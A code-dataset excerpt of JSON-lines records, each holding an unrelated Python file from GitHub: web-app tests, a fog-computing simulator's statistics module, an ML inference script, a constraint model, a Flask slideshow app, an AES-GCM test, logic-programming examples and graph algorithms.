dummy_req.dbsession.commit()\n dummy_req.matchdict['id'] = 1\n response = update_view(dummy_req)\n assert 'entry' in response\n assert isinstance(response['entry'], dict)\n\n\ndef test_update_view_raises_httpnotfound_for_invalid_id(dummy_req):\n \"\"\"Test update view raises HTTPNotFound for invalid id.\"\"\"\n from learning_journal.views.default import update_view\n dummy_req.matchdict['id'] = -1\n with pytest.raises(HTTPNotFound):\n update_view(dummy_req)\n\n\n@pytest.fixture(scope=\"session\")\ndef testapp(request):\n \"\"\"Create a copy of the WSGI app for testing purposes.\"\"\"\n from webtest import TestApp\n from pyramid.config import Configurator\n\n def main():\n config = Configurator()\n settings = {\n 'sqlalchemy.url': 'postgres://localhost:5432/test-learning-journal'\n }\n config = Configurator(settings=settings)\n config.include('pyramid_jinja2')\n config.include('.routes')\n config.include('.models')\n config.scan()\n return config.make_wsgi_app()\n\n app = main()\n\n SessionFactory = app.registry[\"dbsession_factory\"]\n engine = SessionFactory().bind\n Base.metadata.create_all(bind=engine)\n\n def tearDown():\n Base.metadata.drop_all(bind=engine)\n\n request.addfinalizer(tearDown)\n\n return TestApp(app)\n\n\n@pytest.fixture(scope=\"session\")\ndef fill_the_db(testapp):\n SessionFactory = testapp.app.registry[\"dbsession_factory\"]\n with transaction.manager:\n dbsession = get_tm_session(SessionFactory, transaction.manager)\n dbsession.add_all(ENTRIES)\n\nENTRIES = []\nfor i in range(20):\n new_entry = Entry(\n title='title #{}'.format(i),\n body=random.random() * 1000, \n creation_date=FAKE.date_time()\n )\n ENTRIES.append(new_entry)\n\n\ndef test_home_route_has_all_entries(testapp, fill_the_db):\n \"\"\"Test that the page on the home route has all journal entries.\"\"\"\n response = testapp.get('/')\n assert len(ENTRIES) == len(response.html.find_all('hr')) - 1\n\n\ndef test_create_route_has_empty_form(testapp):\n \"\"\"Test that the page on the create route has empty form.\"\"\"\n response = testapp.get('/journal/new-entry')\n assert 1 == len(response.html.find_all('form'))\n assert 0 == len(response.html.find_all(value='value'))\n\n\n# def test_create_adds_new_entry_to_list(testapp):\n# \"\"\"Test that create function adds a new entry properly.\"\"\"\n# response = testapp.get('/journal/new-entry')\n# assert 1 == len(response.html.find_all('form'))\n# assert 0 == len(response.html.find_all(value='value'))\n\n\ndef test_detail_route_has_one_entry(testapp):\n \"\"\"Test that the page on the detail route has one journal entry.\"\"\"\n response = testapp.get('/journal/1')\n assert 1 == len(response.html.find_all('h2'))\n assert 'title #0' in str(response.html.find('h2'))\n\n\ndef test_update_route_has_filled_form(testapp):\n \"\"\"Test that the page on the update route has filled form.\"\"\"\n response = testapp.get('/journal/1/edit-entry')\n assert 1 == len(response.html.find_all('form'))\n assert 'title #0' in str(response.html.find('input'))\n\n\n# def test_update_does_update_an_existing_entry(testapp):\n# \"\"\"Test that the update function correctly updates the original.\"\"\"\n# response = testapp.get('/journal/1/edit-entry')\n# assert 1 == len(response.html.find_all('form'))\n# assert '","repo_name":"mshinners/pyramid-learning-journal","sub_path":"learning_journal/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":7075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8652430091","text":"import pandas as pd\nimport numpy as np\n\nfrom yafs.metrics import Metrics\n\n\nclass Stats:\n\n def __init__(self,defaultPath=\"result\"):\n self.df_link = pd.read_csv(defaultPath + \"_link.csv\")\n self.df = pd.read_csv(defaultPath + \".csv\")\n\n\n def bytes_transmitted(self):\n return self.df_link[\"size\"].sum()\n\n def count_messages(self):\n return len(self.df_link)\n\n\n def utilization(self,id_entity, total_time, from_time=0.0):\n if \"time_service\" not in self.df.columns: #cached\n self.df[\"time_service\"] = self.df.time_out - self.df.time_in\n values = self.df.groupby(\"DES.dst\").time_service.agg(\"sum\")\n return values[id_entity] / total_time\n\n def compute_times_df(self):\n self.df[\"time_latency\"] = self.df[\"time_reception\"] - self.df[\"time_emit\"]\n self.df[\"time_wait\"] = self.df[\"time_in\"] - self.df[\"time_reception\"] #\n self.df[\"time_service\"] = self.df[\"time_out\"] - self.df[\"time_in\"]\n self.df[\"time_response\"] = self.df[\"time_out\"] - self.df[\"time_reception\"]\n self.df[\"time_total_response\"] = self.df[\"time_response\"] + self.df[\"time_latency\"]\n\n def times(self,time,value=\"mean\"):\n if \"time_response\" not in self.df.columns:\n self.compute_times_df()\n return self.df.groupby(\"message\").agg({time:value})\n\n\n\n def average_loop_response(self,time_loops):\n \"\"\"\n No hay chequeo de la existencia del loop: user responsability\n \"\"\"\n if \"time_response\" not in self.df.columns:\n self.compute_times_df()\n\n resp_msg = self.df.groupby(\"message\").agg({\"time_total_response\": [\"mean\",\"count\"]}) #Its not necessary to have \"count\"\n resp_msg.columns = ['_'.join(col).strip() for col in resp_msg.columns.values]\n results = []\n\n for loop in time_loops:\n total = 0.0\n for msg in loop:\n try:\n total += resp_msg[resp_msg.index == msg].time_total_response_mean[0]\n except IndexError:\n total +=0\n\n results.append(total)\n\n return results\n\n def get_watt(self,totaltime,topology,by=Metrics.WATT_SERVICE):\n results = {}\n nodeInfo = topology.get_info()\n if by == Metrics.WATT_SERVICE:\n # Tiempo de actividad / runeo\n if \"time_response\" not in self.df.columns: # cached\n self.compute_times_df()\n\n nodes = self.df.groupby(\"TOPO.dst\").agg({\"time_service\": \"sum\"})\n for id_node in nodes.index:\n results[id_node] = {\"model\": nodeInfo[id_node][\"model\"], \"type\": nodeInfo[id_node][\"type\"],\n \"watt\": nodes.loc[id_node].time_service * nodeInfo[id_node][\"WATT\"]}\n else:\n for node_key in nodeInfo:\n if not nodeInfo[node_key][\"uptime\"][1]:\n end = totaltime\n start = nodeInfo[node_key][\"uptime\"][0]\n uptime = end-start\n results[node_key] = {\"model\":nodeInfo[node_key][\"model\"],\"type\":nodeInfo[node_key][\"type\"],\"watt\":uptime*nodeInfo[node_key][\"WATT\"],\"uptime\":uptime}\n\n return results\n\n # def get_cost_cloud(self, topology):\n # cost = 0.0\n # nodeInfo = topology.get_info()\n # results = {}\n # # Tiempo de actividad / runeo\n # if \"time_response\" not in self.df.columns: # cached\n # self.__compute_times_df()\n #\n # nodes = self.df.groupby(\"TOPO.dst\").agg({\"time_service\": \"sum\"})\n #\n # for id_node in nodes.index:\n # if nodeInfo[id_node][\"type\"] == Entity.ENTITY_CLOUD:\n # results[id_node] = {\"model\": nodeInfo[id_node][\"model\"], \"type\": nodeInfo[id_node][\"type\"],\n # \"watt\": nodes.loc[id_node].time_service * nodeInfo[id_node][\"WATT\"]}\n # cost += nodes.loc[id_node].time_service * nodeInfo[id_node][\"COST\"]\n # return cost,results\n\n def showLoops(self,time_loops):\n results = self.average_loop_response(time_loops)\n for i, loop in enumerate(time_loops):\n print (\"\\t\\t%i - %s :\\t %f\" % (i, str(loop), results[i]))\n return results\n\n\n\n\n def showResults(self, total_time, topology, time_loops=None):\n print (\"\\tSimulation Time: %0.2f\" % total_time)\n\n if time_loops is not None:\n print (\"\\tApplication loops delays:\")\n results = self.average_loop_response(time_loops)\n for i, loop in enumerate(time_loops):\n print (\"\\t\\t%i - %s :\\t %f\" % (i, str(loop), results[i]))\n\n print (\"\\tEnergy Consumed (WATTS by UpTime):\")\n values = self.get_watt(total_time, topology, Metrics.WATT_UPTIME)\n for node in values:\n print (\"\\t\\t%i - %s :\\t %.2f\" % (node, values[node][\"model\"], values[node][\"watt\"]))\n\n print (\"\\tEnergy Consumed by Service (WATTS by Service Time):\")\n values = self.get_watt(total_time, topology, Metrics.WATT_SERVICE)\n for node in values:\n print (\"\\t\\t%i - %s :\\t %.2f\" % (node, values[node][\"model\"], values[node][\"watt\"]))\n\n print (\"\\tCost of execution in cloud:\")\n total, values = self.get_cost_cloud(topology)\n print (\"\\t\\t%.8f\" % total)\n\n print (\"\\tNetwork bytes transmitted:\")\n print (\"\\t\\t%.1f\" % self.bytes_transmitted())\n\n\n def showResults2(self, total_time, time_loops=None):\n print (\"\\tSimulation Time: %0.2f\" % total_time)\n\n if time_loops is not None:\n print (\"\\tApplication loops delays:\")\n results = self.average_loop_response(time_loops)\n for i, loop in enumerate(time_loops):\n print (\"\\t\\t%i - %s :\\t %f\" % (i, str(loop), results[i]))\n\n print (\"\\tNetwork bytes transmitted:\")\n print (\"\\t\\t%.1f\" % self.bytes_transmitted())\n\n \"\"\"ONLYE THE FIRST ONE : DEBUG\"\"\"\n def valueLoop(self, total_time, time_loops=None):\n if time_loops is not None:\n results = self.average_loop_response(time_loops)\n for i, loop in enumerate(time_loops):\n return results[i]\n\n def average_messages_not_transmitted(self):\n return np.mean(self.df_link.buffer)\n\n def peak_messages_not_transmitted(self):\n return np.max(self.df_link.buffer)\n\n def messages_not_transmitted(self):\n return self.df_link.buffer[-1:]\n\n def get_df_modules(self):\n g = self.df.groupby([\"module\", \"DES.dst\"]).agg({\"service\": ['mean', 'sum', 'count']})\n return g.reset_index()\n\n def get_df_service_utilization(self,service,time):\n \"\"\"\n Returns the utilization(%) of a specific module\n \"\"\"\n g = self.df.groupby([\"module\", \"DES.dst\"]).agg({\"service\": ['mean', 'sum', 'count']})\n g.reset_index(inplace=True)\n h = pd.DataFrame()\n h[\"module\"] = g[g.module == service].module\n h[\"utilization\"] = g[g.module == service][\"service\"][\"sum\"]*100 / time\n return h\n\n\n","repo_name":"acsicuib/YAFS","sub_path":"src/yafs/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":7021,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"78"} +{"seq_id":"11201708054","text":"#!/usr/bin/env python\n\"\"\" \nread trained net : model+weights\nread test data from HD5\ninfere for test data \n\nInference works alwasy on 1 IPU\n./predict_one.py -m outY -X\n\n\"\"\"\n\n__author__ = \"Jan Balewski\"\n__email__ = \"janstar1122@gmail.com\"\n\nimport numpy as np\nimport torch\n\nimport time\nimport sys,os\nimport logging\n\nfrom toolbox.Model import MyModelWithLoss\nfrom toolbox.Util_IOfunc import read_yaml, write_yaml, restore_checkpoint\n\nfrom toolbox.Dataloader_h5 import get_data_loader\n\nimport poptorch\nimport popdist.poptorch\n\nsys.path.append(os.path.relpath(\"../torch/toolbox/\"))\nfrom Plotter import Plotter_NeuronInverter\nimport argparse\n\n#...!...!..................\ndef get_parser():\n parser = argparse.ArgumentParser()\n #parser.add_argument(\"--facility\", default='corigpu', type=str)\n parser.add_argument('--venue', dest='formatVenue', choices=['prod','poster'], default='prod',help=\" output quality/arangement\")\n\n parser.add_argument(\"-m\",\"--modelPath\", default='out/', help=\"trained model \")\n parser.add_argument(\"-o\", \"--outPath\", default='same',help=\"output path for plots and tables\")\n \n parser.add_argument( \"-X\",\"--noXterm\", dest='noXterm', action='store_true', default=False, help=\"disable X-term for batch mode\")\n\n parser.add_argument(\"-n\", \"--numSamples\", type=int, default=None, help=\"limit samples to predict\")\n parser.add_argument(\"-v\",\"--verbosity\",type=int,choices=[0, 1, 2], help=\"increase output verbosity\", default=1, dest='verb')\n\n parser.add_argument(\"--cellName\", type=str, default=None, help=\"alternative cell shortName \")\n args = parser.parse_args()\n args.prjName='neurInfer'\n\n for arg in vars(args): print( 'myArg:',arg, getattr(args, arg))\n return args\n\n#...!...!..................\ndef load_model4infer(sumMD,modelPath):\n # ... assemble model\n\n device = torch.device(\"cuda\")\n # load entirel model\n modelF = os.path.join(modelPath, sumMD['train_params']['blank_model'])\n stateF= os.path.join(modelPath, sumMD['train_params']['checkpoint_name'])\n\n print('M: load model:',modelF)\n myModel = torch.load(modelF)\n modelWloss=MyModelWithLoss(myModel)\n print('M: tmp popOpt re-init')\n popOpts = popdist.poptorch.Options()\n popOpts.deviceIterations(1)\n cachePath='./exec_cache'\n popOpts.enableExecutableCaching(cachePath)\n \n print(\"\\n----------- restore model for inference, state= \",stateF)\n startEpoch=restore_checkpoint( stateF, modelWloss)\n\n model4infer = poptorch.inferenceModel(modelWloss.eval(), options=popOpts)\n return model4infer,popOpts\n\n#...!...!..................\ndef model_infer(model,test_loader,sumMD):\n\n criterion =torch.nn.MSELoss() # Mean Squared Loss\n test_loss = 0\n\n # prepare output container, Thorsten's idea\n num_samp=len(test_loader.dataset)\n outputSize=sumMD['train_params']['model']['outputSize']\n print('predict for num_samp=',num_samp,', outputSize=',outputSize)\n # clever list-->numpy conversion, Thorsten's idea\n Uall=np.zeros([num_samp,outputSize],dtype=np.float32)\n Zall=np.zeros([num_samp,outputSize],dtype=np.float32)\n nEve=0\n nStep=0\n cpuLossF=torch.nn.MSELoss(reduction='none' )#returns a loss per element\n \n for j,(data, target) in enumerate(test_loader):\n pred, loss_op = model4infer(data, target)\n loss=np.mean(loss_op.numpy())\n print(j,'=j, type: target=',type(target),target.shape,'pred',type(pred),pred.shape)\n \n cpuLoss2D=cpuLossF(pred,target).numpy()\n #print(j,'=j, type: cpuLoss2D=',type(cpuLoss2D),cpuLoss2D.shape)\n cpuLossV=np.mean(cpuLoss2D,axis=1)\n #print(j,'=j, type: cpuLossV=',type(cpuLossV),cpuLossV.shape)\n cpuLoss=np.mean(cpuLossV)\n \n print('pred j=%d ipuLoss=%.4f, cpuLoss=%.4f Shapes: pred=%s, loss=%s, cpuLossV=%s'%(j,loss,cpuLoss,str(pred.shape),str(loss.shape),str(cpuLossV.shape)))\n '''\n data_dev, target_dev = data.to(device), target.to(device)\n output_dev = model(data_dev)\n lossOp=criterion(output_dev, target_dev)\n print('qq',lossOp,len(test_loader.dataset),len(test_loader)); ok55\n \n output=output_dev.cpu()\n '''\n test_loss += loss\n nEve2=nEve+target.shape[0]\n print('nn',nEve,nEve2)\n Uall[nEve:nEve2,:]=target[:]\n Zall[nEve:nEve2,:]=pred[:]\n nEve=nEve2\n nStep+=1\n test_loss /= nStep\n print('infere done, nEve=%d nStep=%d loss=%.4f'%(nEve,nStep,test_loss))\n return test_loss,Uall,Zall\n\n \n#=================================\n#=================================\n# M A I N \n#=================================\n#=================================\nif __name__ == '__main__':\n args=get_parser()\n logging.basicConfig(format='%(levelname)s - %(message)s', level=logging.INFO)\n\n if args.outPath=='same' : args.outPath=args.modelPath\n sumF=args.modelPath+'/sum_train.yaml'\n sumMD = read_yaml( sumF)\n parMD=sumMD['train_params']\n inpMD=sumMD['input_meta']\n \n model4infer,popOpts=load_model4infer(sumMD,args.modelPath)\n #1print(model)\n\n if args.cellName!=None:\n parMD['cell_name']=args.cellName\n\n if args.numSamples!=None:\n parMD['max_samples_per_epoch' ] = args.numSamples\n domain='test'\n parMD['world_size']=1\n\n data_loader = get_data_loader(parMD, inpMD,domain, popOpts, verb=args.verb)\n\n startT=time.time()\n loss,U,Z=model_infer(model4infer,data_loader,sumMD)\n predTime=time.time()-startT\n print('M: infer : Average loss: %.4f events=%d , elaT=%.2f min\\n'% (loss, Z.shape[0],predTime/60.))\n\n sumRec={}\n sumRec['domain']=domain\n sumRec[domain+'LossMSE']=float(loss)\n sumRec['predTime']=predTime\n sumRec['numSamples']=U.shape[0]\n sumRec['lossThrHi']=0.50 # for tagging plots\n sumRec['inpShape']=sumMD['train_params']['model']['inputShape']\n sumRec['short_name']=sumMD['train_params']['cell_name']\n sumRec['modelDesign']=sumMD['train_params']['model']['myId']\n sumRec['trainRanks']=sumMD['train_params']['world_size']\n sumRec['trainTime']=sumMD['trainTime_sec']\n sumRec['loss_valid']= sumMD['loss_valid']\n\n #\n # - - - - only plotting code is below - - - - -\n \n plot=Plotter_NeuronInverter(args,inpMD ,sumRec )\n\n plot.param_residua2D(U,Z)\n\n write_yaml(sumRec, args.outPath+'/sum_pred.yaml')\n\n #1plot.params1D(U,'true U',figId=7)\n plot.params1D(Z,'pred Z',figId=8)\n\n if 0: \n print('input data example, it will plot waveforms')\n dlit=iter(data_loader)\n xx, yy = next(dlit)\n #1xx, yy = next(dlit) #another sample\n print('batch, X,Y;',xx.shape,xx.dtype,yy.shape,yy.dtype)\n print('Y[:2]',yy[:2])\n plot.frames_vsTime(xx,yy,9)\n \n \n plot.display_all('predict') \n\n","repo_name":"balewski/neuron_inverter_benchmark","sub_path":"poptorch_jan/predict_one.py","file_name":"predict_one.py","file_ext":"py","file_size_in_byte":6640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"813127239","text":"from pycsp3 import *\nfrom pycsp3.tools.utilities import value_in_base\n\nnDisks = data\nnTowers = 3\nnStates, nSteps = nTowers ** nDisks, 2 ** nDisks - 1\n\nx = VarArray(size=nSteps - 1, dom=range(nStates))\n\n\ndef table():\n def are_compatible(state1, state2):\n t1, t2 = value_in_base(state1, nDisks, nTowers), value_in_base(state2, nDisks, nTowers)\n frozen_towers = [False] * nTowers\n for i in range(len(t1) - 1, -1, -1):\n if t1[i] != t2[i]:\n break\n frozen_towers[t1[i]] = True\n return i >= 0 and not frozen_towers[t1[i]] and not frozen_towers[t2[i]] and all(t1[j] == t2[j] for j in range(i))\n\n return {(i, j) for i in range(nStates) for j in range(nStates) if are_compatible(i, j)}\n\n\ntable = table()\n\nsatisfy(\n x[0] in {1, 2},\n\n [(x[i], x[i + 1]) in table for i in range(nSteps - 2)]\n)\n","repo_name":"Jerryyuanyuan/RB_MIX","sub_path":"problems/g5_special/Hanoi.py","file_name":"Hanoi.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"451241413","text":"from flask import Flask, Response, render_template\nimport os\nimport time\nimport json\nimport datetime\nimport glob\n\napp = Flask(__name__, template_folder='template')\n\n#picture_path = os.environ.get('picture_path')\npicture_path = \"/var/infoscreen-munic/pictures\"\n\nrestaurant_counter = 0\nrestaurants = [['Mensa Arcistraße', 'response_mensa-arcisstr.json'], ['Mensa Garching','response_mensa-garching.json'], ['Mensa Leopoldstraße', 'response_mensa-leopoldstr.json'], ['Mensa Lothstraße', 'response_mensa-lothstr.json']]\nNOT_INTRESTING_FOOD = [\"Reis\", \"Tagessuppe\", \"Täglich frische Dessertbar\", \"Täglich frische Salatbar\", \"Saisonale Beilagensalate\"]\n\ndef get_mensa_data(number):\n dishes = []\n with open(\"./MENUs/\" + restaurants[number][1], 'r') as f:\n data = json.load(f)\n weekday = datetime.datetime.now().weekday()\n print(weekday)\n for dish in data['days'][weekday]['dishes'][:][:][:]:\n dishes.append(dish['name'])\n\n # Remove stupid stuff\n dishes[:] = [item for item in dishes if item not in NOT_INTRESTING_FOOD]\n \n return dishes\n\n\ndef gen():\n i = 0\n\n while True:\n time.sleep(5)\n images = get_all_images()\n image_name = images[i]\n im = open(picture_path + image_name, 'rb').read()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + im + b'\\r\\n')\n i += 1\n if i >= len(images):\n i = 0\n\n\ndef get_all_images():\n images = [img for img in os.listdir(picture_path)\n if img.endswith(\".jpg\") or\n img.endswith(\".jpeg\") or\n img.endswith(\"png\")]\n return images\n\n\n@app.route('/slideshow')\ndef slideshow():\n return Response(gen(),\n mimetype='multipart/x-mixed-replace; boundary=frame')\n\n\n@app.route('/update_menu')\ndef update_menu():\n global restaurant_counter\n updated_list = get_mensa_data(restaurant_counter)\n print(update_menu)\n list_name = restaurants[restaurant_counter][0]\n if restaurant_counter < len(restaurants)-1:\n restaurant_counter = restaurant_counter +1\n else:\n restaurant_counter = 0\n return render_template('menus.html', list_name=list_name, items=updated_list)\n\n\n# dishes = get_mensa_data(0)\n# mensa_name = restaurants[0][0]\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n ","repo_name":"flogriesser/infoscreen-munich","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42847400742","text":"#La setencia For \n\"\"\"Python permite recorrer aquellos tipos de datos que sean iterables, es decir, que admitan iterar 2 sobre ellos. \nAlgunos ejemplos de tipos y estructuras de datos que permiten ser iteradas (recorridas) \nson: cadenas de texto, listas, diccionarios, ficheros, etc. La sentencia for nos permite realizar esta acción.\"\"\"\n#La sintaxis de un bucle for es la siguiente:\n\"\"\"\nfor variable in elemento iterable (lista, cadena, range, etc.):\n cuerpo del bucle\n\"\"\"\n\nword = 'Python_es_lo_mejor'\n\nfor letter in word: \n print(letter, end='')\n\n# Python for y la clase range\nfor i in range(11):\n print(i)","repo_name":"luismarquez21/practicas_python","sub_path":"Aprende_python/py006.py","file_name":"py006.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41309985087","text":"\"\"\"Test the aes_gcm utilities.\"\"\"\n\nfrom cryptography.hazmat.primitives.ciphers.aead import AESGCM\n\nfrom .aes_gcm import aes_gcm_encrypt\nfrom .aes_gcm import aes_gcm_decrypt\n\n\ndef test_aes_gcm_mode():\n \"\"\"Test encrypt/decrypt.\"\"\"\n expected = b\"This message is the expected message.\"\n print(expected)\n key = AESGCM.generate_key(bit_length=128)\n print(key)\n (ciphertext, iv) = aes_gcm_encrypt(expected, key)\n print(ciphertext)\n print(iv)\n actual = aes_gcm_decrypt(ciphertext, key, iv)\n print(actual)\n assert actual == expected\n","repo_name":"opentdf/backend","sub_path":"containers/kas/kas_core/tdf3_kas_core/util/cipher/aes_gcm_test.py","file_name":"aes_gcm_test.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"7454126592","text":"from pprint import pprint\n\nfrom pryo import scm\nfrom pryo import KBMan\n\nk = KBMan()\n\n# Facts\nk.father['John', 'Lucy']\nk.father['John', 'Lucas']\nk.mother['Sarah', 'Lucy']\nk.mother['Sarah', 'Lucas']\nk.father['Gregor', 'John']\n\n# Schematic variables for first-order universal quantification\nx, y, z, w = scm('xyzw')\n\n# Declaring a rule\n# - Using brackets for the LHS predicate, roughly meaning:\n# + \"making a new indexed predicate\"\n# - Using parenthesis for each RHS predicate, roughly meaning:\n# + \"calling for unification\"\nk.sibling[x, y] = [\n k.father(z, x),\n k.father(z, y),\n x != y # overloaded operation on schematic variables\n]\n\n# Definition for alternatives\nk.parent[x, y] = k.father(x, y)\nk.parent[x, y] = k.mother(x, y)\n\n# Recursive rules\nk.ancester[x, y] = k.father(x, y)\nk.ancester[x, y] = [k.father(x, z), k.ancester(z, y)]\n\n# Can inspect the knowledge-base status\npprint(k.kb)\n# [father/2['John', 'Lucy'],\n# father/2['John', 'Lucas'],\n# father/2['Gregor', 'John'],\n# mother/2['Sarah', 'Lucy'],\n# mother/2['Sarah', 'Lucas'],\n# (sibling/2[x, y] :- father/2[z, x] & father/2[z, y] & (x != y).),\n# (parent/2[x, y] :- father/2[x, y].),\n# (parent/2[x, y] :- mother/2[x, y].),\n# (ancester/2[x, y] :- father/2[x, y].),\n# (ancester/2[x, y] :- father/2[x, z] & ancester/2[z, y].)]\n\n# The query proxy provides by `KBMan`\nq = k.query\n\n# Optionally using Var object for queries\nfrom pryo import Var\n\n# Do a query with q, with two variable arguments, each variable can be either\n# - explicitly constructed: Var('name')\n# - a string starting with '$': '$name'\nr = q.sibling(Var('who1'), '$who2')\n# Query results are iteratively generated\nprint(next(r))\n# {$who2: 'Lucas', $who1: 'Lucy'}\nprint(next(r))\n# {$who2: 'Lucy', $who1: 'Lucas'}\ntry:\n print(next(r))\nexcept StopIteration:\n print('Query exhausted.')\n\nr = q.parent(\"$lucy's parent\", 'Lucy')\nprint(list(r))\n# [{$lucy's parent: 'John'}, {$lucy's parent: 'Sarah'}]\n\n\n# Query a variable relevant to a constant 'Lucy'\nres = q.ancester('$ancester', '$decedant')\npprint(list(res))\n# [{$ancester: 'John', $decedant: 'Lucy'},\n# {$ancester: 'John', $decedant: 'Lucas'},\n# {$ancester: 'Gregor', $decedant: 'John'},\n# {$ancester: 'Gregor', $decedant: 'Lucy'},\n# {$ancester: 'Gregor', $decedant: 'Lucas'}]\n\n\nimport operator as op\nfrom operator import ge, sub, mul\n\n# Boundary case as fact to add\nk.factorial[0, 1] # fatorial(0) == 1\n\n# Recurive rule (can use list/tuple as RHS)\nk.factorial[x, y] = [\n x >= 0, # let x >= 0, otherwise non-termination while exhausting\n k.factorial(x - 1, z), # let z == factorial(x - 1)\n y == x * z # let y == x * z\n]\n\n# Query results\nr = q.factorial(4, '$w')\nprint(list(r))\n# [{$w: 24}]\n\n\nfrom pryo import TermCnpd\n\n# Declare compound data type\nCons = lambda car, cdr: TermCnpd('Cons', car, cdr)\nNIL = None\n\nxs, ys, zs = scm('xs ys zs'.split())\n\nk.append[NIL, ys, ys]\nk.append[Cons(x, xs), ys, Cons(x, zs)] = k.append(xs, ys, zs)\n# This tricky equation above is short for:\n# k.append[Cons(x, xs), ys, zs] <= [\n# k.append(xs, ys, zs),\n# zs == Cons(x, zs)\n# ]\n\n\nr = q.append(NIL, Cons(3, NIL), '$vs')\npprint(list(r))\n# [{$vs: Cons(3, 'NIL')}]\n\nr = q.append(Cons(1, NIL), Cons(3, NIL), '$vs')\npprint(list(r))\n# [{$vs: Cons(1, Cons(3, 'NIL'))}]\n\nr = q.append(Cons(1, Cons(2, NIL)), Cons(3, Cons(4, NIL)), '$vs')\npprint(list(r))\n# [{$vs: Cons(1, Cons(2, Cons(3, Cons(4, 'NIL'))))}]\n","repo_name":"xye7ei/pryo","sub_path":"examples/use.py","file_name":"use.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"74794562825","text":"class Solution:\r\n def maxProfit(self, prices: List[int]) -> int:\r\n dp = [float('inf')] * len(prices)\r\n \r\n ans = 0\r\n for i in range(len(prices)):\r\n dp[i] = min(dp[i-1], prices[i])\r\n ans = max(ans, prices[i] - dp[i])\r\n \r\n return ans","repo_name":"novayo/LeetCode","sub_path":"0121_Best_Time_to_Buy_and_Sell_Stock/try_3.py","file_name":"try_3.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"42436236971","text":"\"\"\"\n Exception\n\"\"\"\n\nimport sys\n\nprint(sys.platform)\ndef is_it_linux():\n assert('linux' in sys.platform), \"fungsi ini hanya untuk linux\"\nis_it_linux()\n\nname = \"budi\"\n\ntry:\n print(i + name)\nexcept : #except NameError:\n print(\"ada yg salah dari i + name\")\n\nraise Exception(\"stop ada yg salah\")#menghentikan program\n\nprint(i+ objek)","repo_name":"dzikrinasa/Automation","sub_path":"Belajar Python/learn4.py","file_name":"learn4.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25550394297","text":"from collections import defaultdict\nimport graphviz as gv\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\nclass Graph:\n def __init__(self, nodes):\n self.V = nodes\n self.graph = defaultdict(list)\n self.Time = 0\n\n def addEdge(self,u,v): \n self.graph[u].append(v) \n self.graph[v].append(u)\n\n def degre(self, v):\n return self.graph[v]\n\n def APUtil(self,u, visited, ap, parent, low, disc): \n \n children =0\n visited[u]= True\n disc[u] = self.Time \n low[u] = self.Time \n self.Time += 1\n \n for v in self.graph[u]: \n if visited[v] == False : \n parent[v] = u \n children += 1\n\n self.APUtil(v, visited, ap, parent, low, disc) \n low[u] = min(low[u], low[v]) \n if parent[u] == -1 and children > 1: \n ap[u] = True\n \n if parent[u] != -1 and low[v] >= disc[u]: \n ap[u] = True \n \n elif v != parent[u]: \n low[u] = min(low[u], disc[v]) \n \n def AP(self): \n points = list()\n visited = [False] * (self.V) \n disc = [float(\"Inf\")] * (self.V) \n low = [float(\"Inf\")] * (self.V) \n parent = [-1] * (self.V) \n ap = [False] * (self.V) \n for i in range(self.V ): \n if visited[i] == False: \n self.APUtil(i, visited, ap, parent, low, disc) \n for index, value in enumerate (ap): \n if value == True: points.append(index)\n return points\n\n def Remove_articualtion_point(self, point):\n del self.graph[point]\n for i in self.graph: \n if point in self.graph[i] : self.graph[i].remove(point)\n \n def PrintGraph(self):\n for i in self.graph : print(i,self.graph[i])\n \n def DrawGraph(self):\n G = nx.Graph()\n for i in self.graph:\n G.add_node(i)\n for i in self.graph: \n for j in self.graph[i]:\n G.add_edge(j, i)\n \n \n nx.draw(G, with_labels=True, font_weight='bold')\n plt.figure(100)\n #plt.show()\n #plt.cla()\n #plt.cla()\n \n def Color(self):\n G = nx.Graph()\n for i in self.graph:\n G.add_node(i)\n for i in self.graph: \n for j in self.graph[i]:\n G.add_edge(j, i)\n \n pos = nx.spring_layout(G, seed=3113794652) # positions for all nodes\n # nodes\n options = {\"edgecolors\": \"tab:gray\", \"node_size\": 800, \"alpha\": 0.9}\n nx.draw_networkx_nodes(G, pos, nodelist=list(G.nodes), node_color=\"tab:blue\", **options)\n nx.draw_networkx_nodes(G, pos, nodelist=self.AP(), node_color=\"tab:red\", **options)\n nx.draw_networkx_edges(G, pos, width=1.0, alpha=0.5)\n \n nx.draw_networkx_edges(\n G,\n pos,\n edgelist=list(G.edges),\n width=3,\n alpha=0.5,\n edge_color=\"tab:blue\",\n )\n\n\n plt.tight_layout()\n plt.axis(\"off\")\n plt.figure(200)\n #plt.cla()\n \n\n\ng3 = Graph (7) \ng3.addEdge(0, 1) \ng3.addEdge(1, 2) \ng3.addEdge(2, 0) \ng3.addEdge(1, 3) \ng3.addEdge(1, 4) \ng3.addEdge(1, 6) \ng3.addEdge(3, 5) \ng3.addEdge(4, 5) \n\n\n\"\"\"\ng3.PrintGraph()\ng3.DrawGraph()\ng3.Color()\n\"\"\"\nprint 